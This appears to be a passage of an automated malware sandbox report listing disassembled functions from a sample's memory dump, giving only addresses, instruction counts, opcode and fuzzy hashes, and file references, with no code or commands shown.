                                        • Instruction ID: c8a224d7b97d8c23894383ef705c9c5e69ab66a57892c2f07ccc3a977dbbf726
                                        • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                        • Instruction Fuzzy Hash: E7E0D8723006016BE7119E5ACCC4F577BAEDFE2B14F14047EB5089F2A5C9F2DD0986A4
                                        Function 01466030 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                        • Instruction ID: b517dc49e6a433c0f75f3b10a865676948e3c802ae6245e4db0456695a0d811f
                                        • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                        • Instruction Fuzzy Hash: ACF01CB2104204AFE3218F09D944B52BBFCEB45368F56C026E6099B661D379EC40CBA5
                                        Function 013D0710 Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                        • Instruction ID: 5f56128752d65a8a2ee3cdfedf625dda2af77cc9bebea3182923d52ac2f8eac2
                                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                        • Instruction Fuzzy Hash: 23F0E53A6043559BDB1ADF2AD040A967BE8FB51754F010095F8528F361E731E982CB90
                                        Function 014049D0 Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                        • Instruction ID: f58b849f218509acd725850950e9b5d6c6113815aa96d9a54586220b48d2307c
                                        • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                        • Instruction Fuzzy Hash: 94E0D832244245ABD7232A5B8800F6777A5DBD07A0F19043AE7048B2E0DB74DCC1DBD8
                                        Function 014A4164 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: df419fe9f9e72bd457f066b0247c8af7a66f1e4a5b1c2e2019f50ae1f50e6c4e
                                        • Instruction ID: b3efa35d8d6f53acab0efaae89b28f4f285d8fb839c42177c02f83442246a0f5
                                        • Opcode Fuzzy Hash: df419fe9f9e72bd457f066b0247c8af7a66f1e4a5b1c2e2019f50ae1f50e6c4e
                                        • Instruction Fuzzy Hash: DCF0A031A256A14FE762D76CD148B5B77E0AB30634FCF0566D41187A66C3B0EC40C650
                                        Function 0147678E Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                        • Instruction ID: 09e54cd44db824932302ada9c36094a7f4c54adc2a1ae264a67e641318fd8f35
                                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                        • Instruction Fuzzy Hash: 6DE0D832600510BBEB2197598D05FDBBEADDB90E94F050055B600D71E0D530DE04D690
                                        Function 014A08C0 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                        • Instruction ID: e5e1d59b7a5391fa34690217ca6fc43f2a4c86ede89356dc6a79a767386c4dc7
                                        • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                        • Instruction Fuzzy Hash: 2DE09B316403508BCB258A1EC140A93B7E8DFB5660F56806FE90547762C231F842C6D4
                                        Function 013D25E0 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 6eab938ca68540b79a089e7d2e7034ffdc82c3dcd307cd9226668b0181aa1044
                                        • Instruction ID: 2b58e03693700495dd6f0417394d4b4d1f4525362c3e17eeb7e729b1ff8f77c0
                                        • Opcode Fuzzy Hash: 6eab938ca68540b79a089e7d2e7034ffdc82c3dcd307cd9226668b0181aa1044
                                        • Instruction Fuzzy Hash: A7E092321006549BC721FF2EDD01F9B77AAEF60364F114519B115571A0CA74A910C794
                                        Function 0148A456 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                        • Instruction ID: 173df56f08c732c6ed4342247260550b474321d880f222c853cefab26821d591
                                        • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                        • Instruction Fuzzy Hash: 90E06D31010A21DBEB326F2EC848B567AE1BF60B11F24883EA196025F0C7B59890CA40
                                        Function 01454000 Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                        • Instruction ID: fbf938df28fd9e1c0de764d283114e941022d38b69528d3b68e915e531158e65
                                        • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                        • Instruction Fuzzy Hash: FCE0C2743003058FE755CF19C044B677BB6BFD5A10F28C069A9488F30AEB32E882CB40
                                        Function 0140CA38 Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ffda4aec3eac8c5d6aa12c7b1ab1be9efafed8dab56a08512e5c96eac77467d5
                                        • Instruction ID: e1cf8b1862c28bb9e51797bbf91c8cfe5de0107a0a6cd00b3d6bb58c8f242fb3
                                        • Opcode Fuzzy Hash: ffda4aec3eac8c5d6aa12c7b1ab1be9efafed8dab56a08512e5c96eac77467d5
                                        • Instruction Fuzzy Hash: FED0C232481020BACB66F22EBC44FA32A9A9B40224F0148B2F108920B1D534CCC18AD4
                                        Function 013C823B Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                        • Instruction ID: 457f4bd7ea6dbb3228fba06eede2fd2a11552f5843b0c1544dc62885de907dc6
                                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                        • Instruction Fuzzy Hash: 88E0CD31400625DFDB322F16DC04F5176A6FFA4F14F2048AEE041164B887B09DC1DB44
                                        Function 013D2050 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16bdf5ff2238aabebf98f5b4360005a5146927c98eb0c20d2e4fbc053bce6a37
                                        • Instruction ID: d631e772cf1343e2a3088348dbd93450a3c74681dbc95186e07e11078d8c986d
                                        • Opcode Fuzzy Hash: 16bdf5ff2238aabebf98f5b4360005a5146927c98eb0c20d2e4fbc053bce6a37
                                        • Instruction Fuzzy Hash: 38E0C2332006606BC711FB5EED00F5A739EEFA4274F014121F155876E4CA74ED00C794
                                        Function 0140E59C Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                        • Instruction ID: 1449e6fc1c14d37f1d21c57c4df325a8fd1297098d39c8a323a845361d35e7ac
                                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                        • Instruction Fuzzy Hash: 07D0A7321046205BD7329A1CFC04FC333D8BB48724F050459B005C7150C360EC41C644
                                        Function 0144E908 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                        • Instruction ID: dd6997ff4fb3f0ff9d2879ff82e1869050ae775b3ad14a375565a624d5ccbcef
                                        • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                        • Instruction Fuzzy Hash: 3DE0EC369507849BDF16DF5DD644F5ABBF5BB94B40F150458A1086B6B1C638E900CB40
                                        Function 013CA0E3 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                        • Instruction ID: 64e8ce7a27cb7817ebd9346cba797525b3abed5ffd522d14c0b50d615957643e
                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                        • Instruction Fuzzy Hash: B1D0223221203493CF28565A6C04F637909ABC0EE8F0A006C740B93800C0048C42D3E0
                                        Function 0140A830 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                        • Instruction ID: 200dee10f79b934d40b622338944f1a4c61a4cf99c1c2af9e997805db450b5d6
                                        • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                        • Instruction Fuzzy Hash: B6D012371D065DBBCB119F66DC01F957BA9E764BA0F444020B505875A0C63AE960D584
                                        Function 0140CA24 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1554908d232c68737c69f27c80849d42ca4829713a43f315d3599e20b698b239
                                        • Instruction ID: 51e132bf9ba991c86af2a9e7805c5db5b0b9eed3309fffabfdfe4c4a28d88f97
                                        • Opcode Fuzzy Hash: 1554908d232c68737c69f27c80849d42ca4829713a43f315d3599e20b698b239
                                        • Instruction Fuzzy Hash: A1D05E30A01112CBEF17CB49C554A2A36B0EB10641B4000B9EA0152270E334D8018A50
                                        Function 013E02A0 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                        • Instruction ID: 6f8f25483ec68ab08251e82f6d3268aecc7e1ec5021053d89a73759dd3243db6
                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                        • Instruction Fuzzy Hash: 0FD09235312A80CFD61A8B0CC5A8B1533E4BB84A48F854490E441CBB62D66CD940CA00
                                        Function 0140C700 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                        • Instruction ID: f1c3524bd21b6e45ded11d44a287c2fa7f6a329415de73d34ea7de9bdcb6c064
                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                        • Instruction Fuzzy Hash: 78C01232290648AFCB12AA99CD01F027BA9EBA8B40F000061F2058B6B0C631E820EA84
                                        Function 013F0310 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                        • Instruction ID: 137c9da3f989d939e5e17def3e5c7cd798e7ef388b554db7d935508d4e1921b3
                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                        • Instruction Fuzzy Hash: C7D01236100248EFCB05DF55C890D9A772BFBD8710F148019FD19076118A31ED62DA50
                                        Function 013D0750 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                        • Instruction ID: 1ca71fe9ad33c78fb7dfa3979c4a275f0cbc093e283a50c4bb1eb14d20cd0328
                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                        • Instruction Fuzzy Hash: 25C04879701A568FDF16DB6ED298F4A77E4FB44744F1508D0E805DBB22EA24E841CA10
                                        Function 01414340 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61d19c6450e12d4585b2ee5f1f12c310d2d0672850c0f1bf5e4f75cf464f81a9
                                        • Instruction ID: 11009dd582896dcd0a72843780a56da12d75602eac7882c38278248c1e636e5c
                                        • Opcode Fuzzy Hash: 61d19c6450e12d4585b2ee5f1f12c310d2d0672850c0f1bf5e4f75cf464f81a9
                                        • Instruction Fuzzy Hash: 829002316058111291407158488554A4045ABF0301B95C012E0424555CCF248A965361
                                        Function 01414650 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fcae67302791a7138045c66c1c6a15f465904ffa1cc8f319f5468c3e6d4e8624
                                        • Instruction ID: 4e283ccb524ebf43c5d5426c8b802bac9bc5626f6629f5249340cc21cb10da2b
                                        • Opcode Fuzzy Hash: fcae67302791a7138045c66c1c6a15f465904ffa1cc8f319f5468c3e6d4e8624
                                        • Instruction Fuzzy Hash: 3E9002616015114241407158480540A6045ABF13013D5C116E0554561CCB2889959369
                                        Function 01412BE0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad952f70be74aa1ecfd92c902af5041960ed462e1a4fedb0c4382e69ebcf301a
                                        • Instruction ID: 2c62a738f70398b71d84b095cc4f064f0a2fb216ba29b182a7c35f6eb3dc36e1
                                        • Opcode Fuzzy Hash: ad952f70be74aa1ecfd92c902af5041960ed462e1a4fedb0c4382e69ebcf301a
                                        • Instruction Fuzzy Hash: 7390023120545942D14071584405A4A00559BE0305F95C012E0064695DDB358E95B761
                                        Function 01412BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b474bb6462f5616b699dd3e3dca9c7aecbe03f391dba2e183be150a23926eff7
                                        • Instruction ID: 4acaebf85fea0e02c5eadcc458e9b0be65524891a57f8bfdb8a2665d46f2ac8c
                                        • Opcode Fuzzy Hash: b474bb6462f5616b699dd3e3dca9c7aecbe03f391dba2e183be150a23926eff7
                                        • Instruction Fuzzy Hash: 0090023120141902D1807158440564E00459BE1301FD5C016E0025655DCF258B9977A1
                                        Function 01412B80 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5da597f38c02b38b36c627f08cc86605f6c231db025cea10796148e53c972b40
                                        • Instruction ID: e9875ec9c1136c7b0c621c0275fcc36a7cf15454f4e9c2f61de554cdccac1dec
                                        • Opcode Fuzzy Hash: 5da597f38c02b38b36c627f08cc86605f6c231db025cea10796148e53c972b40
                                        • Instruction Fuzzy Hash: 7B90023120141902D1047158480568A00459BE0301F95C012E6024656EDB7589D17231
                                        Function 01412BA0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e648d092808889a14bc69e1507543b484566d6af4c85a28452a02b7516e8a54c
                                        • Instruction ID: 18f68960f8c9cf23d367df545f923be22c98ba2045b6d5f3649ce81727d3d602
                                        • Opcode Fuzzy Hash: e648d092808889a14bc69e1507543b484566d6af4c85a28452a02b7516e8a54c
                                        • Instruction Fuzzy Hash: 4B90023160541902D1507158441574A00459BE0301F95C012E0024655DCB658B9577A1
                                        Function 01412AD0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e984cb5b7415402585f0dbdade9c1cf694fee1159469eee7febe6afd97da209e
                                        • Instruction ID: 63e092eae401d43e078d29dd8ae684b884cdaeaab6ccad13e3e41c45adc19085
                                        • Opcode Fuzzy Hash: e984cb5b7415402585f0dbdade9c1cf694fee1159469eee7febe6afd97da209e
                                        • Instruction Fuzzy Hash: 89900225211411030105B558070550B00869BE5351395C022F1015551CDB3189A15221
                                        Function 01412AF0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8bae4a6072f9ced3ccbb608f2543c6178e2d4ba68492b25935a91ec112f86252
                                        • Instruction ID: 7d7c746ae1e9ffc4ef85ffa94319784f74d8bee95169ab2e40e0ed0d8ff8732c
                                        • Opcode Fuzzy Hash: 8bae4a6072f9ced3ccbb608f2543c6178e2d4ba68492b25935a91ec112f86252
                                        • Instruction Fuzzy Hash: 6E900225221411020145B558060550F0485ABE63513D5C016F1416591CCB3189A55321
                                        Function 01412AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8dd043f0655540897a1b99a8a1b36e279cd1a878467c749c47d02642ddb3855
                                        • Instruction ID: 688db5ee8bdb0775abc2470fc7a90b4b89c67b1208fc1bca1579637f6d2b51cf
                                        • Opcode Fuzzy Hash: d8dd043f0655540897a1b99a8a1b36e279cd1a878467c749c47d02642ddb3855
                                        • Instruction Fuzzy Hash: 7C9002A1201551924500B2588405B0E45459BF0201B95C017E1054561CCA3589919235
                                        Function 01412D00 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06d20005889d082c45fb4a6cec7c9f788889a00e53d71b850a873d80df5ff5fa
                                        • Instruction ID: 915fce549cdd4a1673146e1db11d9aed06a6f71fda0862194c72b3b2df370fdd
                                        • Opcode Fuzzy Hash: 06d20005889d082c45fb4a6cec7c9f788889a00e53d71b850a873d80df5ff5fa
                                        • Instruction Fuzzy Hash: C390022120545542D10075585409A0A00459BE0205F95D012E1064596DCB358991A231
                                        Function 01412D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2debca2b591194329d900bd7c5364bc8ffd4958571ef207afe43ae323c74316
                                        • Instruction ID: 0efd6e23d214f6db36ea9595dce118b5bf52e71f9534d32e2794253d0ce0bbfc
                                        • Opcode Fuzzy Hash: c2debca2b591194329d900bd7c5364bc8ffd4958571ef207afe43ae323c74316
                                        • Instruction Fuzzy Hash: 9290022921341102D1807158540960E00459BE1202FD5D416E0015559CCE2589A95321
                                        Function 01412D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e69498545271a8cb7a57ab517de11c9f63cc918af5c30a6dc82653f4c0fc91fe
                                        • Instruction ID: 14aaf7c2a2cbd49d0394e43358893699ddfe68e329c31ee75eb9f55aa7f99079
